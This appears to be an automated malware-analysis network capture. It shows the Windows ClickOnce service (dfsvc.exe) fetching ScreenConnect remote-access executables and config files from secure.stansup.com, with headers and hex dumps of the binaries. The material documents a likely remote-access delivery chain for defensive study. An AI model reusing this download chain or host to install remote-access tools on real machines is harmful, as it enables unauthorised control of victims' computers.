                                                                                                                                                                                                                                                      2024-10-25 17:29:27 UTC16384INData Raw: 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e4 d0 40 00 5e 5d c3 55 8b ec 56 68 90 dd 40 00 68 88 dd 40 00 68 90 dd 40 00 6a 03 e8 4a fe ff ff 83 c4 10 8b f0 ff 75 0c ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e8 d0 40 00 5e 5d c3 55 8b ec 56 68 a4 dd 40 00 68 9c dd 40 00 68 a4 dd 40 00 6a 04 e8 0c fe ff ff 8b f0 83 c4 10 85 f6 74 15 ff 75 10 8b ce ff 75 0c ff 75 08 ff 15 88 d1 40 00 ff d6 eb 0c ff 75 0c ff 75 08 ff 15 60 d0 40 00 5e 5d c3 56 e8 56 ed ff ff 8b 70 04 85 f6 74 0a 8b ce ff 15 88 d1 40 00 ff d6 e8 de 15 00 00 cc 55 8b ec 8b 45 10 8b 4d 08 81 78 04 80 00 00 00 7f 06 0f be 41 08 5d c3 8b 41 08 5d c3 55 8b ec 8b 45 08 8b 4d 10 89 48 08 5d c3 53 51 bb 30 40 41 00 e9 0f 00 00 00 cc cc cc cc 53 51 bb 30 40 41 00 8b
                                                                                                                                                                                                                                                      Data Ascii: t@@^]UVh@h@h@jJuut@@^]UVh@h@h@jtuuu@uu`@^]VVpt@UEMxA]A]UEMH]SQ0@ASQ0@A
                                                                                                                                                                                                                                                      2024-10-25 17:29:27 UTC16384INData Raw: 01 8b 88 80 00 00 00 85 c9 74 03 f0 ff 01 8b 88 8c 00 00 00 85 c9 74 03 f0 ff 01 56 6a 06 8d 48 28 5e 81 79 f8 38 46 41 00 74 09 8b 11 85 d2 74 03 f0 ff 02 83 79 f4 00 74 0a 8b 51 fc 85 d2 74 03 f0 ff 02 83 c1 10 83 ee 01 75 d6 ff b0 9c 00 00 00 e8 4e 01 00 00 59 5e 5d c3 8b ff 55 8b ec 51 53 56 8b 75 08 57 8b 86 88 00 00 00 85 c0 74 6c 3d 48 46 41 00 74 65 8b 46 7c 85 c0 74 5e 83 38 00 75 59 8b 86 84 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 30 d9 ff ff ff b6 88 00 00 00 e8 28 fb ff ff 59 59 8b 86 80 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 0e d9 ff ff ff b6 88 00 00 00 e8 04 fc ff ff 59 59 ff 76 7c e8 f9 d8 ff ff ff b6 88 00 00 00 e8 ee d8 ff ff 59 59 8b 86 8c 00 00 00 85 c0 74 45 83 38 00 75 40 8b 86 90 00 00 00 2d fe 00 00 00 50 e8 cc d8 ff ff 8b 86
                                                                                                                                                                                                                                                      Data Ascii: ttVjH(^y8FAttytQtuNY^]UQSVuWtl=HFAteF|t^8uYt8uP0(YYt8uPYYv|YYtE8u@-P
                                                                                                                                                                                                                                                      2024-10-25 17:29:27 UTC16384INData Raw: 72 09 8b 48 08 03 ce 3b f9 72 0a 42 83 c0 28 3b d3 72 e8 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a fe 68 20 2e 41 00 68 80 36 40 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 04 40 41 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 00 00 40 00 e8 7c 00 00 00 83 c4 04 85 c0 74 54 8b 45 08 2d 00 00 40 00 50 68 00 00 40 00 e8 52 ff ff ff 83 c4 08 85 c0 74 3a 8b 40 24 c1 e8 1f f7 d0 83 e0 01 c7 45 fc fe ff ff ff 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 8b 45 08 b9 4d 5a 00 00 66 39 08 75 1d 8b 48 3c 03 c8 81 39 50
                                                                                                                                                                                                                                                      Data Ascii: rH;rB(;r3_^[]Ujh .Ah6@dPSVW@A1E3PEdeEh@|tTE-@Ph@Rt:@$EMdY_^[]E38eE3MdY_^[]UEMZf9uH<9P
                                                                                                                                                                                                                                                      2024-10-25 17:29:27 UTC16384INData Raw: 00 65 00 2d 00 61 00 74 00 00 00 64 00 65 00 2d 00 63 00 68 00 00 00 64 00 65 00 2d 00 64 00 65 00 00 00 64 00 65 00 2d 00 6c 00 69 00 00 00 64 00 65 00 2d 00 6c 00 75 00 00 00 64 00 69 00 76 00 2d 00 6d 00 76 00 00 00 00 00 65 00 6c 00 2d 00 67 00 72 00 00 00 65 00 6e 00 2d 00 61 00 75 00 00 00 65 00 6e 00 2d 00 62 00 7a 00 00 00 65 00 6e 00 2d 00 63 00 61 00 00 00 65 00 6e 00 2d 00 63 00 62 00 00 00 65 00 6e 00 2d 00 67 00 62 00 00 00 65 00 6e 00 2d 00 69 00 65 00 00 00 65 00 6e 00 2d 00 6a 00 6d 00 00 00 65 00 6e 00 2d 00 6e 00 7a 00 00 00 65 00 6e 00 2d 00 70 00 68 00 00 00 65 00 6e 00 2d 00 74 00 74 00 00 00 65 00 6e 00 2d 00 75 00 73 00 00 00 65 00 6e 00 2d 00 7a 00 61 00 00 00 65 00 6e 00 2d 00 7a 00 77 00 00 00 65 00 73 00 2d 00 61 00 72 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: e-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ar
                                                                                                                                                                                                                                                      2024-10-25 17:29:28 UTC13815INData Raw: 33 30 33 9a 33 a1 33 b3 33 bc 33 04 34 16 34 1e 34 28 34 31 34 42 34 54 34 6f 34 af 34 c1 34 c7 34 db 34 2f 35 39 35 3f 35 45 35 b0 35 b9 35 f2 35 fd 35 f2 37 25 38 2a 38 50 39 68 39 95 39 b0 39 c0 39 c5 39 cf 39 d4 39 df 39 ea 39 fe 39 4f 3a f6 3a 17 3b 70 3b 7b 3b ca 3b e2 3b 2c 3c c2 3c d9 3c 57 3d 9b 3d ad 3d e3 3d e8 3d f5 3d 01 3e 17 3e 2a 3e 5d 3e 6c 3e 71 3e 82 3e 88 3e 93 3e 9b 3e a6 3e ac 3e b7 3e bd 3e cb 3e d4 3e d9 3e e6 3e eb 3e f8 3e 06 3f 0d 3f 15 3f 2e 3f 40 3f 4c 3f 54 3f 6c 3f 91 3f a2 3f ab 3f f2 3f 00 60 00 00 18 01 00 00 26 30 4d 30 67 30 be 30 cb 30 d6 30 e0 30 e6 30 fa 30 06 31 7f 31 88 31 b4 31 bd 31 c5 31 e2 31 07 32 19 32 35 32 59 32 74 32 7f 32 25 33 d8 33 e1 33 e9 33 04 35 0a 35 1c 35 2f 35 7f 35 b0 35 e0 35 2b 36 27 37 3b 37
                                                                                                                                                                                                                                                      Data Ascii: 3033333444(414B4T4o44444/595?5E555557%8*8P9h9999999999O::;p;{;;;,<<<W======>>*>]>l>q>>>>>>>>>>>>>>>???.?@?L?T?l?????`&0M0g000000011111112252Y2t22%3333555/5555+6'7;7


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      3192.168.2.54972379.110.49.1854433056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:29:29 UTC134OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      2024-10-25 17:29:29 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 61216
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:29:29 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:29:29 UTC16169INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8c 50 0f bc 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ba 00 00 00 0a 00 00 00 00 00 00 06 d8 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 7f 7c 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELP"0 @ |@
                                                                                                                                                                                                                                                      2024-10-25 17:29:29 UTC16384INData Raw: 00 01 00 93 0e 06 00 de 10 22 0a 06 00 60 10 22 0a 06 00 42 26 7b 0e 06 00 e9 1d 68 0e 06 00 31 0f 46 00 06 00 f3 1a 9d 0e 06 00 53 1f a1 0e 06 00 79 27 a6 0e 06 00 84 18 22 0a 36 00 6d 08 aa 0e 16 00 9b 00 af 0e 16 00 b4 00 af 0e 16 00 29 03 af 0e 36 00 6d 08 b9 0e 16 00 37 01 af 0e 06 00 bf 1c be 0e 16 00 a8 1a c3 0e 36 00 6d 08 d0 0e 16 00 25 00 d5 0e 16 00 36 19 87 0e 36 00 6d 08 e7 0e 16 00 ff 07 ec 0e 16 00 36 08 f7 0e 06 00 0f 2f 01 0f 06 00 51 20 57 0e 06 00 c6 19 06 0f 06 00 d8 19 06 0f 06 00 70 19 0b 0f 16 00 a8 1a c3 0e 36 00 6d 08 10 0f 16 00 e7 00 15 0f 16 00 46 03 1e 0f 16 00 d4 05 29 0f 16 00 c1 06 34 0f 16 00 6b 07 34 0f 16 00 73 03 49 0f 16 00 83 01 54 0f 16 00 d5 03 5f 0f 36 00 6d 08 cb 0a 16 00 be 01 c2 0a 16 00 f9 03 c2 0a 16 00 19 06
                                                                                                                                                                                                                                                      Data Ascii: "`"B&{h1FSy'"6m)6m76m%66m6/Q Wp6mF)4k4sIT_6m
                                                                                                                                                                                                                                                      2024-10-25 17:29:29 UTC16384INData Raw: 68 72 65 73 68 6f 6c 64 4c 61 62 65 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 61 64 64 5f 4d 6f 75 73 65 57 68 65 65 6c 00 50 6f 70 75 6c 61 74 65 50 61 6e 65 6c 00 65 6d 70 74 79 52 65 73 75 6c 74 73 50 61 6e 65 6c 00 72 65 73 75 6c 74 73 50 61 6e 65 6c 00 70 61 6e 65 6c 00 53 65 6c 65 63 74 41 6c 6c 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 42 61 63 6b 73 74 61 67 65 53 68 65 6c 6c 00 73 65 74 5f 41 75 74 6f 53 63 72 6f 6c 6c 00 41 73 73 65 72 74 4e 6f 6e 4e 75 6c 6c 00 67 65 74 5f 43 6f 6e 74 72 6f 6c 00 53 63 72 6f 6c 6c 61 62 6c 65 43 6f 6e 74 72 6f 6c 00 63 6f 6e 74 72 6f 6c 00 67 65 74 5f 4c 50 61 72 61 6d 00 67 65 74 5f 57 50 61 72 61 6d 00 50 72 6f 67 72 61 6d 00 67 65 74 5f 49 74 65 6d 00 54
                                                                                                                                                                                                                                                      Data Ascii: hresholdLabelSystem.ComponentModeladd_MouseWheelPopulatePanelemptyResultsPanelresultsPanelpanelSelectAllScreenConnect.WindowsBackstageShellset_AutoScrollAssertNonNullget_ControlScrollableControlcontrolget_LParamget_WParamProgramget_ItemT
                                                                                                                                                                                                                                                      2024-10-25 17:29:29 UTC12279INData Raw: 00 6e 00 65 00 63 00 74 00 2e 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 42 00 61 00 63 00 6b 00 73 00 74 00 61 00 67 00 65 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 00 00 3c 00 0e 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 00 00 3c 00 0c 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 33 00 2e 00 38 00 39 00 33 00 36 00 00 00 40 00 0c 00 01 00 41 00 73 00 73 00 65 00 6d 00 62 00 6c 00 79 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 33 00 2e 00 38 00 39 00 33 00 36 00 00 00 30 e4 00 00 ea 01 00 00
                                                                                                                                                                                                                                                      Data Ascii: nect.WindowsBackstageShell.exe<ProductNameScreenConnect<ProductVersion24.2.3.8936@Assembly Version24.2.3.89360


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      4192.168.2.54972579.110.49.1854433056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:29:31 UTC138OUTGET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      2024-10-25 17:29:31 UTC213INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 266
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:29:31 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:29:31 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      5192.168.2.54972779.110.49.1854433056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:29:32 UTC133OUTGET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      2024-10-25 17:29:32 UTC213INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 266
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:29:32 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:29:32 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      6192.168.2.54973079.110.49.1854433056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:29:33 UTC117OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      2024-10-25 17:29:33 UTC213INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 266
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:29:33 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:29:33 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      7192.168.2.54973279.110.49.1854433056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:29:34 UTC131OUTGET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      2024-10-25 17:29:35 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 81696
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:29:34 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:29:35 UTC16169INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a 9c 58 f1 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 40 00 00 00 d4 00 00 00 00 00 00 e6 5e 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 96 ab 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELzX"0@^ `@ `@
                                                                                                                                                                                                                                                      2024-10-25 17:29:35 UTC16384INData Raw: 34 35 32 62 2d 38 39 37 35 2d 37 34 61 38 35 38 32 38 64 33 35 34 00 00 13 01 00 02 00 00 00 04 54 65 78 74 05 53 74 61 74 65 00 00 08 01 00 0b 00 00 00 00 00 00 00 3c 7d b5 15 e6 e4 47 39 a8 2f df 51 21 71 d1 7d 7c b4 23 ff 20 aa 00 bc c6 ea 30 f6 ac ab 55 7c cb 13 b1 66 bd 7a 69 bd d1 74 04 f3 9e 32 ae b2 e1 88 de 6c a2 e7 df 05 2c 86 6e 6d 86 5d ac ab b4 f5 fc e8 bf af d9 ab 77 e1 9c 9d 9d 47 f8 bc 1f 97 32 ee 22 45 7e 53 a9 85 d4 74 40 81 47 46 8a 90 dd d2 c3 e6 60 69 82 ec 5a 08 9c b2 91 6b 34 e0 d0 8f ba 84 fe 4b 55 db 67 ae 56 73 fe 12 00 00 00 00 81 c5 e8 85 00 00 00 00 02 00 00 00 7b 00 00 00 18 5e 00 00 18 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 53 44 53 cb 4c a1 5b 4d 39 69 48 9a 46 34 07
                                                                                                                                                                                                                                                      Data Ascii: 452b-8975-74a85828d354TextState<}G9/Q!q}|# 0U|fzit2l,nm]wG2"E~St@GF`iZk4KUgVs{^@RSDSL[M9iHF4
                                                                                                                                                                                                                                                      2024-10-25 17:29:35 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 d2 ff ff 55 d1 fe ff 54 d0 fd ff 53 cf fb ff 52 cc f8 ff 51 c9 f4 ff 50 c6 f0 ff 4e c2 eb ff 4c bc e5 ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff 4c bc e5 ff 4e c2 eb ff 50 c6 f0 ff 51 c9 f4 ff 52 cc f8 ff 53 ce fa ff 54 d0 fd ff 55 d1 fe ff 55 d2 ff ff
                                                                                                                                                                                                                                                      Data Ascii: UUTSRQPNL::::::::::::::::::::::::::::::::::::::LNPQRSTUU
                                                                                                                                                                                                                                                      2024-10-25 17:29:35 UTC16384INData Raw: d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: ffffffffffffffgggggggggggggggggggggggggggggggggggggggggg
                                                                                                                                                                                                                                                      2024-10-25 17:29:35 UTC16375INData Raw: 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 6e cd f3 ff 85 e0 ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 9a e5 ff ef 00 00 00 00 00 00 00 00 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f e0 ef 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: n


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
